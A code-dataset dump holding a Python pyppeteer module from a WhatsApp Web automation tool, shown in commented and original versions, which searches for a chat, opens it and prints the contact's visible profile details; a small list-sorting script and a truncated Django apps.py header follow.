    if any(choosed_target[0] in i for i in contact_tuple):
        # Contacts get their full profile info printed; groups just a title.
        complete_target_info = await get_complete_info_on_target(page)
        print_complete_target_info(complete_target_info)
        await close_contact_info_page(page)
    else:
        __print_selected_target_title(target_focused_title)
    __check_target_focused_title(page, target, target_focused_title)
    await __wait_for_message_area(page)
    return target_focused_title
async def search_and_select_target_without_new_chat_button(page,target, hide_groups=False):
    """Search *target* through the main chat/message search box.

    Same flow as search_and_select_target, but works without the "new chat"
    button. Returns the chosen chat's name.
    """
    await __type_in_chat_or_message_search(page,target)
    chats_messages_groups_elements_list = await __get_chats_messages_groups_elements(page)
    contact_name_index_tuple_list = await __get_contacts_matched_with_query(chats_messages_groups_elements_list)
    group_name_index_tuple_list = await __get_groups_matched_with_query(chats_messages_groups_elements_list,hide_groups)
    target_tuple = (contact_name_index_tuple_list,group_name_index_tuple_list)
    __print_target_tuple(target_tuple)
    target_index_chosen = __ask_user_to_choose_the_filtered_target(target_tuple)
    # chosen_target is a tuple (name, index) where index points into
    # chats_messages_groups_elements_list.
    chosen_target = __get_choosed_target(target_tuple, target_index_chosen)
    await __open_selected_chat(chosen_target[1],chats_messages_groups_elements_list)
    target_name = chosen_target[0]
    # Contacts get their info panel scraped and printed; groups are just opened.
    if any(chosen_target[0] in i for i in contact_name_index_tuple_list):
        complete_target_info = await get_complete_info_on_target(page)
        print_complete_target_info(complete_target_info)
        await close_contact_info_page(page)
    else:
        __print_selected_target_title(target_name)
    await __wait_for_message_area(page)
    return target_name
# endregion
#region LOGGER create
# Module-level logger used by all search helpers; writes to logs.log.
# NOTE(review): the `Logger` annotation refers to the wplay.utils.Logger
# *module*, not a class; the actual runtime type is logging.Logger — confirm.
logger : Logger = Logger.setup_logger('logs',logs_path/'logs.log')
#endregion
# region SEARCH AND SELECT TARGET
async def __type_in_chat_or_message_search(page, target):
    """Type *target* into the main chat/message search box and let results load."""
    try:
        print(f'Looking for: {target}')
        search_selector = whatsapp_selectors_dict['chat_or_message_search']
        await page.waitForSelector(search_selector, visible=True, timeout=0)
        await page.waitFor(500)
        await page.type(search_selector, target)
        await page.waitFor(3000)
    except Exception as e:
        print(e)
async def __get_chats_messages_groups_elements(page):
    """Return every chat/group/message element in the search-results pane.

    Exits the program if the DOM query fails.
    """
    try:
        selector = whatsapp_selectors_dict['chats_groups_messages_elements']
        return await page.querySelectorAll(selector)
    except Exception as e:
        print(e)
        exit()
async def __get_contacts_matched_with_query(chats_groups_messages_elements_list):
    """Pair each contact result's title with its index in the element list."""
    matches = []
    title_getter = 'node => node.parentNode.getAttribute("title")'
    for position, candidate in enumerate(chats_groups_messages_elements_list):
        try:
            title = await candidate.querySelectorEval(
                whatsapp_selectors_dict['contact_element'], title_getter)
        except ElementHandleError:
            # Not a contact entry; move on to the next element.
            continue
        except Exception as e:
            print(e)
        else:
            matches.append((title, position))
    return matches
async def __get_groups_matched_with_query(chats_groups_messages_elements_list, hide_groups):
    """Pair each group result's title with its index; empty when hiding groups."""
    matches = []
    if hide_groups:
        return matches
    title_getter = 'node => node.parentNode.getAttribute("title")'
    for position, candidate in enumerate(chats_groups_messages_elements_list):
        try:
            title = await candidate.querySelectorEval(
                whatsapp_selectors_dict['group_element'], title_getter)
        except ElementHandleError:
            # Not a group entry; move on to the next element.
            continue
        except Exception as e:
            print(e)
        else:
            matches.append((title, position))
    return matches
async def __open_selected_chat(target_index, chats_messages_groups_elements_list):
    """Click the search-result element at *target_index* to open that chat.

    Exits the program if the index is invalid or the click fails.
    """
    try:
        chosen_element = chats_messages_groups_elements_list[target_index]
        await chosen_element.click()
    except Exception as e:
        print(f"This target doesn't exist! Error: {str(e)}")
        exit()
async def get_complete_info_on_target(page):
    """Open the target's contact-info panel and scrape name, about/phone and groups.

    Returns a dict that may contain 'Name', 'Last_seen', 'About', 'Mobile'
    and 'Groups'; keys are missing when the corresponding scrape fails.
    """
    # BUG FIX: this dict was only assigned inside `try`, so a failure in
    # waitForSelector/click raised UnboundLocalError at the `return` below.
    complete_target_info = {}
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['target_chat_header'],
            visible=True,
            timeout=3000
        )
        await page.click(whatsapp_selectors_dict['target_chat_header'])
        contact_page_elements = await get_contact_page_elements(page)
        await get_contact_name_info(contact_page_elements[0], complete_target_info)
        await get_contact_about_and_phone(contact_page_elements[3], complete_target_info)
        await get_contact_groups_common_with_target(complete_target_info, page)
    except Exception as e:
        print(e)
    return complete_target_info
async def get_contact_page_elements(page):
    """Return the elements of the contact-info page, or [] on any failure."""
    elements = []
    try:
        selector = whatsapp_selectors_dict['contact_info_page_elements']
        await page.waitForSelector(selector, visible=True, timeout=8000)
        elements = await page.querySelectorAll(selector)
    except Exception as e:
        print(e)
    return elements
async def get_contact_name_info(contact_name_element, complete_target_info):
    """Scrape 'Name' and 'Last_seen' from the header into *complete_target_info*.

    WhatsApp only exposes "last seen" sometimes; on failure the dict is left
    partially filled.
    """
    try:
        complete_target_info['Name'] = await contact_name_element.querySelectorEval('span > span', 'element => element.innerText')
        complete_target_info['Last_seen'] = await contact_name_element.querySelectorEval('div > span:last-of-type > div > span', 'element => element.getAttribute("title")')
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed
        # SystemExit/KeyboardInterrupt.
        print('last seen not available')
async def get_contact_about_and_phone(contact_name_element, complete_target_info):
    """Scrape the 'About' text and phone number into *complete_target_info*."""
    about_selector = 'div:nth-child(2) > div > div > span > span'
    mobile_selector = 'div:last-of-type > div > div > span > span'
    try:
        complete_target_info['About'] = await contact_name_element.querySelectorEval(about_selector, 'element => element.getAttribute("title")')
        complete_target_info['Mobile'] = await contact_name_element.querySelectorEval(mobile_selector, 'element => element.innerText')
    except Exception as e:
        print(e)
async def get_contact_groups_common_with_target(complete_target_info, page):
    """Store the groups shared with the target under 'Groups' ([] when none)."""
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['contact_info_page_group_element_heading'],
            visible=True,
            timeout=3000
        )
        if (await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["contact_info_page_group_element_heading"]}").innerText'))\
                == "Groups in common":
            group_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_group_elements'])
            complete_target_info['Groups'] = [await ele.querySelectorEval('div>div>div:nth-child(2)>div:first-child>div>div>span', 'e => e.getAttribute("title")') for ele in group_elements]
        else:
            complete_target_info['Groups'] = []
    except Exception:
        # BUG FIX: narrowed from a bare `except:` so SystemExit and
        # KeyboardInterrupt propagate instead of being swallowed.
        complete_target_info['Groups'] = []
        print('No groups in common')
async def close_contact_info_page(page):
    """Click the close button of the contact-info page, if it shows up in time."""
    try:
        close_button = whatsapp_selectors_dict['contact_info_page_close_button']
        await page.waitForSelector(close_button, visible=True, timeout=5000)
        await page.click(close_button)
    except Exception as e:
        print(e)
def print_complete_target_info(complete_target_info):
    """Pretty-print the scraped target info, one field per line."""
    for field, value in complete_target_info.items():
        if field == "Groups":
            print("Groups:")
            print(*value, sep=",")
        else:
            print(f'{field}: {value} ')
async def __open_new_chat(page):
    """Open the "new chat" panel; waits indefinitely (timeout=0) for the button."""
    await page.waitForSelector(
        whatsapp_selectors_dict['new_chat_button'],
        visible=True,
        timeout=0
    )
    await page.waitFor(500)  # small settle delay before clicking
    await page.click(whatsapp_selectors_dict['new_chat_button'])
async def __type_in_new_chat_search_bar(page, target):
    """Type *target* into the "new chat" contact search input."""
    print(f'Looking for: {target}')
    logger.info('Searching Target')
    await page.waitForSelector(
        whatsapp_selectors_dict['search_contact_input_new_chat'],
        visible=True
    )
    await page.type(whatsapp_selectors_dict['search_contact_input_new_chat'], target)
    # Give WhatsApp time to populate the filtered results.
    await page.waitFor(3000)
async def __get_contacts_elements_filtered(page, target):
    """Return contact result elements for *target* ([] when none show in 3s)."""
    contact_list_elements_unchecked = list()
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['contact_list_elements_filtered_new_chat'],
            visible=True,
            timeout=3000
        )
        contact_list_elements_unchecked = await page.querySelectorAll(
            whatsapp_selectors_dict['contact_list_elements_filtered_new_chat']
        )
    except Exception:
        # BUG FIX: was a bare `except:`; a timeout simply means no matches.
        print(f'No contact named by "{target}"!')
        logger.info('Target not found')
    return contact_list_elements_unchecked
async def __get_groups_elements_filtered(page, target, hide_groups=False):
    """Return group result elements for *target* ([] when hidden or none in 3s)."""
    group_list_elements_unchecked = list()
    if hide_groups:
        return group_list_elements_unchecked
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['group_list_elements_filtered_new_chat'],
            visible=True,
            timeout=3000
        )
        group_list_elements_unchecked = await page.querySelectorAll(
            whatsapp_selectors_dict['group_list_elements_filtered_new_chat']
        )
    except Exception:
        # BUG FIX: was a bare `except:`; a timeout simply means no matches.
        print(f'No group named by "{target}"!')
        logger.info('Target not found in groups')
    return group_list_elements_unchecked
async def __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked):
    """Read the "title" attribute of each filtered contact element via the DOM."""
    titles = []
    for index, _ in enumerate(contact_list_elements_unchecked):
        selector = whatsapp_selectors_dict["contact_list_elements_filtered_new_chat"]
        script = f'document.querySelectorAll("{selector}")[{index}].getAttribute("title")'
        titles.append(await page.evaluate(script))
    return titles
async def __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked):
    """Read the "title" attribute of each filtered group element via the DOM."""
    titles = []
    for index, _ in enumerate(group_list_elements_unchecked):
        selector = whatsapp_selectors_dict["group_list_elements_filtered_new_chat"]
        script = f'document.querySelectorAll("{selector}")[{index}].getAttribute("title")'
        titles.append(await page.evaluate(script))
    return titles
# Pair each unchecked contact title with its DOM element.
def __zip_contact_titles_and_elements_unchecked(contact_titles_unchecked, contact_list_elements_unchecked):
    """Return [(title, element), ...] for the unchecked contact results."""
    pairs = zip(contact_titles_unchecked, contact_list_elements_unchecked)
    return list(pairs)
def __zip_group_titles_and_elements_unchecked(group_titles_unchecked, group_list_elements_unchecked):
    """Return [(title, element), ...] for the unchecked group results."""
    pairs = zip(group_titles_unchecked, group_list_elements_unchecked)
    return list(pairs)
# Keep only contacts whose title contains the target (case-insensitive).
def __check_contact_list(target, contact_list_unchecked):
    """Return a tuple of (title, element) pairs whose title contains *target*.

    Replaces the original index-juggling while/pop loop (quadratic and
    error-prone) with a single filtering pass; callers only use the returned
    tuple, never the mutated argument.
    """
    query = target.lower()
    return tuple(
        entry for entry in contact_list_unchecked
        if entry[0].lower().find(query) != -1
    )
def __check_group_list(target, group_list_unchecked):
    """Return a tuple of (title, element) pairs whose title contains *target*.

    Same filtering-pass rewrite as __check_contact_list; the original
    while/pop loop was quadratic and error-prone.
    """
    query = target.lower()
    return tuple(
        entry for entry in group_list_unchecked
        if entry[0].lower().find(query) != -1
    )
# target_tuple packs (contact_tuple, group_tuple): index 0 holds the contact
# (title, element) pairs, index 1 the group pairs.
def __get_target_tuple(contact_tuple, group_tuple):
    """Bundle filtered contacts and groups into a single 2-tuple."""
    return (contact_tuple, group_tuple)
def __print_target_tuple(target_tuple):
    """Print contacts and groups as one continuous numbered list (contacts first)."""
    contacts, groups = target_tuple
    contact_count = len(contacts)
    for number, entry in enumerate(contacts):
        if number == 0:
            print("Contacts found:")
            logger.info('List of Targets')
        print(f'{number}: {entry[0]}')
    for offset, entry in enumerate(groups):
        if offset == 0:
            print("Groups found:")
            logger.info('List of Target in groups')
        number = contact_count + offset
        print(f'{number}: {entry[0]}')
def __ask_user_to_choose_the_filtered_target(target_tuple):
    """Prompt for the number of the desired result.

    Returns the chosen index, or implicitly None when there are no results
    (callers treat None as "abort").
    Raises ValueError if the user types something that is not an integer.
    """
    if len(target_tuple[0] + target_tuple[1]) > 0:
        logger.info('Input Target Number')
        target_index_choosed = int(
            input('Enter the number of the target you wish to choose: '))
        return target_index_choosed
def __get_choosed_target(target_tuple, target_index_choosed):
    """Map the user's chosen index back to a (title, element) pair.

    Indexes [0, len(contacts)) select contacts; higher indexes select groups.
    Exits the program on None, negative or out-of-range indexes.
    """
    length_of_contacts_tuple = len(target_tuple[0])
    if target_index_choosed is None:
        exit()
    try:
        if 0 <= target_index_choosed < length_of_contacts_tuple:
            choosed_target = target_tuple[0][target_index_choosed]
        elif target_index_choosed >= length_of_contacts_tuple:
            choosed_target = target_tuple[1][target_index_choosed - length_of_contacts_tuple]
        else:
            # BUG FIX: negative indexes used to fall into the first branch and
            # silently select from the *end* of the contacts tuple.
            print("This target doesn't exist!")
            logger.error('Invalid Target')
            exit()
    except Exception as e:
        print(f"This target doesn't exist! Error: {str(e)}")
        logger.error('Invalid Target')
        exit()
    return choosed_target
async def __navigate_to_target(page, choosed_target):
    """Click the chosen (title, element) pair's element to open its chat."""
    try:
        element = choosed_target[1]
        await element.click()
    except Exception as e:
        print(f"This target doesn't exist! Error: {str(e)}")
        logger.error('Invalid Target')
        exit()
async def __get_focused_target_title(page, target):
    """Return the "title" attribute of the currently focused chat header.

    Exits the program if the selector never resolves (no chat focused).
    """
    try:
        await page.waitForSelector(whatsapp_selectors_dict['target_focused_title'])
        target_focused_title = await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["target_focused_title"]}").getAttribute("title")')
    except Exception as e:
        print(f'No target selected! Error: {str(e)}')
        logger.error('Target not selected from list')
        exit()
    return target_focused_title
def __print_selected_target_title(target_focused_title):
    """Announce which chat ended up selected."""
    print(f"You've selected the target named by: {target_focused_title}")
    logger.info('Selected Target')
def __check_target_focused_title(page, target, target_focused_title):
    """Warn when the focused chat doesn't match *target*; let the user abort."""
    if target_focused_title.lower().find(target.lower()) == -1:
        print(f"You're focused in the wrong target, {target_focused_title}")
        must_continue = str(input("Do you want to continue (yes/no)? "))
        if must_continue.lower() not in {'yes', 'y'}:
            exit()
async def __wait_for_message_area(page):
    """Block until the message input area is available (i.e. the chat is usable)."""
    try:
        selector = whatsapp_selectors_dict['message_area']
        await page.waitForSelector(selector)
    except Exception as e:
        print(f"You don't belong this group anymore! Error: {str(e)}")
# endregion
| 38.94433
| 189
| 0.72194
|
__author__ = 'Alexandre Calil Martins Fonseca, github: xandao6'
from wplay.utils.helpers import whatsapp_selectors_dict
from wplay.utils import Logger
from wplay.utils.helpers import logs_path
from pyppeteer.errors import ElementHandleError
async def search_and_select_target(page, target, hide_groups=False):
await __open_new_chat(page)
await __type_in_new_chat_search_bar(page, target)
contact_list_elements_unchecked = await __get_contacts_elements_filtered(page, target)
group_list_elements_unchecked = await __get_groups_elements_filtered(page, target, hide_groups)
contact_titles_unchecked = await __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked)
group_titles_unchecked = await __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked)
contact_list_unchecked = __zip_contact_titles_and_elements_unchecked(
contact_titles_unchecked, contact_list_elements_unchecked)
group_list_unchecked = __zip_group_titles_and_elements_unchecked(
group_titles_unchecked, group_list_elements_unchecked)
contact_tuple = __check_contact_list(target, contact_list_unchecked)
group_tuple = __check_group_list(target, group_list_unchecked)
target_tuple = __get_target_tuple(contact_tuple, group_tuple)
__print_target_tuple(target_tuple)
target_index_choosed = __ask_user_to_choose_the_filtered_target(target_tuple)
choosed_target = __get_choosed_target(target_tuple, target_index_choosed)
await __navigate_to_target(page, choosed_target)
target_focused_title = await __get_focused_target_title(page, target)
if any(choosed_target[0] in i for i in contact_tuple):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_focused_title)
__check_target_focused_title(page, target, target_focused_title)
await __wait_for_message_area(page)
return target_focused_title
async def search_and_select_target_without_new_chat_button(page,target, hide_groups=False):
await __type_in_chat_or_message_search(page,target)
chats_messages_groups_elements_list = await __get_chats_messages_groups_elements(page)
contact_name_index_tuple_list = await __get_contacts_matched_with_query(chats_messages_groups_elements_list)
group_name_index_tuple_list = await __get_groups_matched_with_query(chats_messages_groups_elements_list,hide_groups)
target_tuple = (contact_name_index_tuple_list,group_name_index_tuple_list)
__print_target_tuple(target_tuple)
target_index_chosen = __ask_user_to_choose_the_filtered_target(target_tuple)
chosen_target = __get_choosed_target(target_tuple, target_index_chosen)
await __open_selected_chat(chosen_target[1],chats_messages_groups_elements_list)
target_name = chosen_target[0]
if any(chosen_target[0] in i for i in contact_name_index_tuple_list):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_name)
await __wait_for_message_area(page)
return target_name
logger : Logger = Logger.setup_logger('logs',logs_path/'logs.log')
async def __type_in_chat_or_message_search(page,target):
try:
print(f'Looking for: {target}')
await page.waitForSelector(
whatsapp_selectors_dict['chat_or_message_search'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.type(whatsapp_selectors_dict['chat_or_message_search'], target)
await page.waitFor(3000)
except Exception as e:
print(e)
async def __get_chats_messages_groups_elements(page):
chats_messages_groups_elements_list = []
try:
chats_messages_groups_elements_list = await page.querySelectorAll\
(whatsapp_selectors_dict['chats_groups_messages_elements'])
return chats_messages_groups_elements_list
except Exception as e:
print(e)
exit()
async def __get_contacts_matched_with_query(chats_groups_messages_elements_list):
contacts_to_choose_from = []
get_contact_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
contact_name = await element.querySelectorEval(whatsapp_selectors_dict['contact_element'],get_contact_node_title_function)
contacts_to_choose_from.append((contact_name,idx))
except ElementHandleError:
continue
except Exception as e:
print(e)
return contacts_to_choose_from
async def __get_groups_matched_with_query(chats_groups_messages_elements_list,hide_groups):
groups_to_choose_from = []
if hide_groups:
return groups_to_choose_from
get_group_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
group_name = await element.querySelectorEval(whatsapp_selectors_dict['group_element'],
get_group_node_title_function)
groups_to_choose_from.append((group_name,idx))
except ElementHandleError:
continue
except Exception as e:
print(e)
return groups_to_choose_from
async def __open_selected_chat(target_index,chats_messages_groups_elements_list):
try:
await chats_messages_groups_elements_list[target_index].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
exit()
async def get_complete_info_on_target(page):
    """Open the target's contact-info panel and scrape name, about/phone and groups.

    Returns a dict that may contain 'Name', 'Last_seen', 'About', 'Mobile'
    and 'Groups'; keys are missing when the corresponding scrape fails.
    """
    # BUG FIX: this dict was only assigned inside `try`, so a failure in
    # waitForSelector/click raised UnboundLocalError at the `return` below.
    complete_target_info = {}
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['target_chat_header'],
            visible=True,
            timeout=3000
        )
        await page.click(whatsapp_selectors_dict['target_chat_header'])
        contact_page_elements = await get_contact_page_elements(page)
        await get_contact_name_info(contact_page_elements[0], complete_target_info)
        await get_contact_about_and_phone(contact_page_elements[3], complete_target_info)
        await get_contact_groups_common_with_target(complete_target_info, page)
    except Exception as e:
        print(e)
    return complete_target_info
async def get_contact_page_elements(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_elements'],
visible=True,
timeout=8000
)
contact_page_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_elements'])
except Exception as e:
print(e)
return contact_page_elements
async def get_contact_name_info(contact_name_element, complete_target_info):
    """Scrape 'Name' and 'Last_seen' from the header into *complete_target_info*."""
    try:
        complete_target_info['Name'] = await contact_name_element.querySelectorEval('span > span', 'element => element.innerText')
        complete_target_info['Last_seen'] = await contact_name_element.querySelectorEval('div > span:last-of-type > div > span', 'element => element.getAttribute("title")')
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed
        # SystemExit/KeyboardInterrupt.
        print('last seen not available')
async def get_contact_about_and_phone(contact_name_element, complete_target_info):
try:
complete_target_info['About'] = await contact_name_element.querySelectorEval('div:nth-child(2) > div > div > span > span', 'element => element.getAttribute("title")')
complete_target_info['Mobile'] = await contact_name_element.querySelectorEval('div:last-of-type > div > div > span > span', 'element => element.innerText')
except Exception as e:
print(e)
async def get_contact_groups_common_with_target(complete_target_info, page):
    """Store the groups shared with the target under 'Groups' ([] when none)."""
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['contact_info_page_group_element_heading'],
            visible=True,
            timeout=3000
        )
        if (await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["contact_info_page_group_element_heading"]}").innerText'))\
                == "Groups in common":
            group_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_group_elements'])
            complete_target_info['Groups'] = [await ele.querySelectorEval('div>div>div:nth-child(2)>div:first-child>div>div>span', 'e => e.getAttribute("title")') for ele in group_elements]
        else:
            complete_target_info['Groups'] = []
    except Exception:
        # BUG FIX: narrowed from a bare `except:` so SystemExit and
        # KeyboardInterrupt propagate instead of being swallowed.
        complete_target_info['Groups'] = []
        print('No groups in common')
async def close_contact_info_page(page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_close_button'],
visible = True,
timeout = 5000
)
await page.click(whatsapp_selectors_dict['contact_info_page_close_button'])
except Exception as e:
print(e)
def print_complete_target_info(complete_target_info):
for key in complete_target_info.keys():
if key == "Groups":
print("Groups:")
print(*complete_target_info[key], sep=",")
else:
print(f'{key}: {complete_target_info[key]} ')
async def __open_new_chat(page):
await page.waitForSelector(
whatsapp_selectors_dict['new_chat_button'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.click(whatsapp_selectors_dict['new_chat_button'])
async def __type_in_new_chat_search_bar(page, target):
print(f'Looking for: {target}')
logger.info('Searching Target')
await page.waitForSelector(
whatsapp_selectors_dict['search_contact_input_new_chat'],
visible=True
)
await page.type(whatsapp_selectors_dict['search_contact_input_new_chat'], target)
await page.waitFor(3000)
async def __get_contacts_elements_filtered(page, target):
    """Return contact result elements for *target* ([] when none show in 3s)."""
    contact_list_elements_unchecked = list()
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['contact_list_elements_filtered_new_chat'],
            visible=True,
            timeout=3000
        )
        contact_list_elements_unchecked = await page.querySelectorAll(
            whatsapp_selectors_dict['contact_list_elements_filtered_new_chat']
        )
    except Exception:
        # BUG FIX: was a bare `except:`; a timeout simply means no matches.
        print(f'No contact named by "{target}"!')
        logger.info('Target not found')
    return contact_list_elements_unchecked
async def __get_groups_elements_filtered(page, target, hide_groups=False):
    """Return group result elements for *target* ([] when hidden or none in 3s)."""
    group_list_elements_unchecked = list()
    if hide_groups:
        return group_list_elements_unchecked
    try:
        await page.waitForSelector(
            whatsapp_selectors_dict['group_list_elements_filtered_new_chat'],
            visible=True,
            timeout=3000
        )
        group_list_elements_unchecked = await page.querySelectorAll(
            whatsapp_selectors_dict['group_list_elements_filtered_new_chat']
        )
    except Exception:
        # BUG FIX: was a bare `except:`; a timeout simply means no matches.
        print(f'No group named by "{target}"!')
        logger.info('Target not found in groups')
    return group_list_elements_unchecked
async def __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked):
contact_titles_unchecked = []
for i in range(len(contact_list_elements_unchecked)):
contact_titles_unchecked\
.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["contact_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return contact_titles_unchecked
async def __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked):
group_titles_unchecked = []
for i in range(len(group_list_elements_unchecked)):
group_titles_unchecked.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["group_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return group_titles_unchecked
# contact_list_unchecked is a zip (list of tuples) of contact_titles and
# contact elements, unchecked.
def __zip_contact_titles_and_elements_unchecked(contact_titles_unchecked, contact_list_elements_unchecked):
contact_list_unchecked = list(zip(contact_titles_unchecked, contact_list_elements_unchecked))
return contact_list_unchecked
def __zip_group_titles_and_elements_unchecked(group_titles_unchecked, group_list_elements_unchecked):
group_list_unchecked = list(zip(group_titles_unchecked, group_list_elements_unchecked))
return group_list_unchecked
# Keep only contacts whose title contains the target (case-insensitive).
def __check_contact_list(target, contact_list_unchecked):
    """Return a tuple of (title, element) pairs whose title contains *target*.

    Replaces the original index-juggling while/pop loop (quadratic and
    error-prone) with a single filtering pass; callers only use the returned
    tuple, never the mutated argument.
    """
    query = target.lower()
    return tuple(
        entry for entry in contact_list_unchecked
        if entry[0].lower().find(query) != -1
    )
def __check_group_list(target, group_list_unchecked):
    """Return a tuple of (title, element) pairs whose title contains *target*.

    Same filtering-pass rewrite as __check_contact_list; the original
    while/pop loop was quadratic and error-prone.
    """
    query = target.lower()
    return tuple(
        entry for entry in group_list_unchecked
        if entry[0].lower().find(query) != -1
    )
# target_list is like that: (((0, 'a'), (1, 'b')), ((3, 'c'), (4, 'd'))),
# but instead numbers and letters we have titles and elements
# the first index is the contacts and the second is the groups
def __get_target_tuple(contact_tuple, group_tuple):
target_tuple = (contact_tuple, group_tuple)
return target_tuple
def __print_target_tuple(target_tuple):
lenght_of_contacts_tuple = len(target_tuple[0])
lenght_of_groups_tuple = len(target_tuple[1])
for i in range(lenght_of_contacts_tuple):
if lenght_of_contacts_tuple <= 0:
break
if i == 0:
print("Contacts found:")
logger.info('List of Targets')
print(f'{i}: {target_tuple[0][i][0]}')
for i in range(lenght_of_contacts_tuple, lenght_of_groups_tuple + lenght_of_contacts_tuple):
if lenght_of_groups_tuple <= 0:
break
if i == lenght_of_contacts_tuple:
print("Groups found:")
logger.info('List of Target in groups')
print(f'{i}: {target_tuple[1][i-lenght_of_contacts_tuple][0]}')
def __ask_user_to_choose_the_filtered_target(target_tuple):
if len(target_tuple[0] + target_tuple[1]) > 0:
logger.info('Input Target Number')
target_index_choosed = int(
input('Enter the number of the target you wish to choose: '))
return target_index_choosed
def __get_choosed_target(target_tuple, target_index_choosed):
    """Map the user's chosen index back to a (title, element) pair.

    Indexes [0, len(contacts)) select contacts; higher indexes select groups.
    Exits the program on None, negative or out-of-range indexes.
    """
    length_of_contacts_tuple = len(target_tuple[0])
    if target_index_choosed is None:
        exit()
    try:
        if 0 <= target_index_choosed < length_of_contacts_tuple:
            choosed_target = target_tuple[0][target_index_choosed]
        elif target_index_choosed >= length_of_contacts_tuple:
            choosed_target = target_tuple[1][target_index_choosed - length_of_contacts_tuple]
        else:
            # BUG FIX: negative indexes used to fall into the first branch and
            # silently select from the *end* of the contacts tuple.
            print("This target doesn't exist!")
            logger.error('Invalid Target')
            exit()
    except Exception as e:
        print(f"This target doesn't exist! Error: {str(e)}")
        logger.error('Invalid Target')
        exit()
    return choosed_target
async def __navigate_to_target(page, choosed_target):
try:
await choosed_target[1].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
async def __get_focused_target_title(page, target):
try:
await page.waitForSelector(whatsapp_selectors_dict['target_focused_title'])
target_focused_title = await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["target_focused_title"]}").getAttribute("title")')
except Exception as e:
print(f'No target selected! Error: {str(e)}')
logger.error('Target not selected from list')
exit()
return target_focused_title
def __print_selected_target_title(target_focused_title):
print(f"You've selected the target named by: {target_focused_title}")
logger.info('Selected Target')
def __check_target_focused_title(page, target, target_focused_title):
if target_focused_title.lower().find(target.lower()) == -1:
print(f"You're focused in the wrong target, {target_focused_title}")
must_continue = str(input("Do you want to continue (yes/no)? "))
accepted_yes = {'yes', 'y'}
if must_continue.lower() in accepted_yes:
pass
else:
exit()
async def __wait_for_message_area(page):
try:
await page.waitForSelector(whatsapp_selectors_dict['message_area'])
except Exception as e:
print(f"You don't belong this group anymore! Error: {str(e)}")
# endregion
| true
| true
|
f7053131cfb854f87cef18f6a13009e7cb2dedd0
| 349
|
py
|
Python
|
21 Others/BEG.py
|
XuuRee/python-data-structures
|
a3972f5781d666d15d61c0d474877880d1b7c483
|
[
"MIT"
] | null | null | null |
21 Others/BEG.py
|
XuuRee/python-data-structures
|
a3972f5781d666d15d61c0d474877880d1b7c483
|
[
"MIT"
] | null | null | null |
21 Others/BEG.py
|
XuuRee/python-data-structures
|
a3972f5781d666d15d61c0d474877880d1b7c483
|
[
"MIT"
] | null | null | null |
def beg(arr):
    """Return arr's 0s, then 1s, then 2s, in order; any other value is dropped."""
    zeros = [value for value in arr if value == 0]
    ones = [value for value in arr if value == 1]
    twos = [value for value in arr if value == 2]
    return zeros + ones + twos
# Demo inputs: empty, all zeros, mixed 1s/2s, and a full mix of 0/1/2.
a = []
b = [0,0,0]
c = [1,2,1,1,2,1,2]
d = [0,2,1,0,1,0,2,2,2,1,0,2,1,0,1,2,0]
print(beg(a))
print(beg(b))
print(beg(c))
print(beg(d))
| 14.541667
| 39
| 0.381089
|
def beg(arr):
    """Stable-partition arr into 0s, 1s and 2s (anything else is discarded)."""
    buckets = {0: [], 1: [], 2: []}
    for value in arr:
        if value in buckets:
            buckets[value].append(value)
    return buckets[0] + buckets[1] + buckets[2]
# Demo inputs: empty, all zeros, mixed 1s/2s, and a full mix of 0/1/2.
a = []
b = [0,0,0]
c = [1,2,1,1,2,1,2]
d = [0,2,1,0,1,0,2,2,2,1,0,2,1,0,1,2,0]
print(beg(a))
print(beg(b))
print(beg(c))
print(beg(d))
| true
| true
|
f7053142d8894d29c2b779e200a2ae10343b6829
| 138
|
py
|
Python
|
modules/msa/msa/contrib/master/apps.py
|
haoyutan/MSA-Framework
|
7c5553b244347f26029729161e15e60b0cc805f5
|
[
"MIT"
] | 2
|
2016-11-22T11:44:52.000Z
|
2017-08-29T02:38:01.000Z
|
modules/msa/msa/contrib/master/apps.py
|
haoyutan/MSA-Framework
|
7c5553b244347f26029729161e15e60b0cc805f5
|
[
"MIT"
] | null | null | null |
modules/msa/msa/contrib/master/apps.py
|
haoyutan/MSA-Framework
|
7c5553b244347f26029729161e15e60b0cc805f5
|
[
